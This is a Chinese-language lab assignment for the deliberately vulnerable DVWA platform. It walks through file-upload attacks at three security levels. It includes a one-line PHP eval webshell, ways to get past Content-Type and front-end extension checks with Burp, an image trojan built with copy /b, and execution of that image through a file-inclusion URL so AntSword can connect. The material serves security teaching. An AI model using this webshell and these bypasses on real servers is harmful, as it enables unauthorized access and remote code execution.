任务一:文件上传初级
实验环境:
配置DVWA平台,点击File Upload
进入DVWA平台,选择DVWA Security,将安全级别设置为low。
步骤:
- 上传一句话木马文件,给出上传成功的截图,一句话木马文件名用自己姓名拼音命名,比如lwx.php
<?php @eval($_POST['a']);?>
- 用蚁剑连接,给出蚁剑测试连接成功的截图以及连接到网站后台的截图。
任务一:文件上传中级
配置DVWA平台, 点击File Upload
进入DVWA平台,选择DVWA Security,将安全级别设置为Medium。
- 源码分析,中级加了什么过滤方式
- 方法1:使用Content-Type过滤绕过。(木马文件以自己姓名拼音命名)
- 使用bp抓包将php文件的的Content-Type改为将content-type改为image/jpeg或者image/png。
- 上传一句话木马。给出上传成功的截图。
- 使用蚁剑连接。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。
- 方法2:前端JS过滤绕过。(木马文件以自己姓名拼音命名)
1)将木马文件命名为.jpg或者png,绕过前端JS的验证, 用bp抓包,在将文件扩展名改成.php,因为后端没有验证,这样就可以成功上传扩展名为.php的木马。
2)上传一句话木马。给出上传成功的截图。
3)使用蚁剑连接。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。
任务二:文件上传高级
配置DVWA平台, 点击File Upload
进入DVWA平台,选择DVWA Security,将安全级别设置为High。
- 源码分析,高级加了什么过滤。
- 制作图片马,图片马用自己的姓名的拼音命名。
- copy /b 1.png+lwx.php 2.png
2)查看图片马最后被追加的一句话木马。
- 上传图片马,给出上传成功的截图。
- 分析此时用蚁剑连接图片马失败的原因。
此时由于图片马中的php代码并没有被解析,所以不能直接使用蚁剑进行连接,需要配合其他漏洞。 此时可以结合文件包含漏洞获取webshell。
- 利用文件包含漏洞解析并执行代码。
点到file Inclusion。此时的级别为high。将page换成我们要包含的木马文件路径:
page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png,并验证文件包含漏洞是否利用成功。
(以自己电脑实际路径和命名为准)
- 用蚁剑连接,并添加cookie头。
url中输入包含图片马的的链接:
http://192.168.56.144/DVWA-master/vulnerabilities/fi/?page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png
(以自己电脑实际路径为准)
添加cookie头
成功连接蚁剑
- 分析第六步中连接蚁剑时为什么要加cookie头。
一句话木马的话,把木马写入了目标机,直接连接的时候就不用设置cookie,如果是通过文件包含来连接,就需要设置cookie,因为dvwa/vulnerabilities/fi路径下的index.php文件(也就是存在文件包含漏洞的文件)是需要验证cookie才能访问的。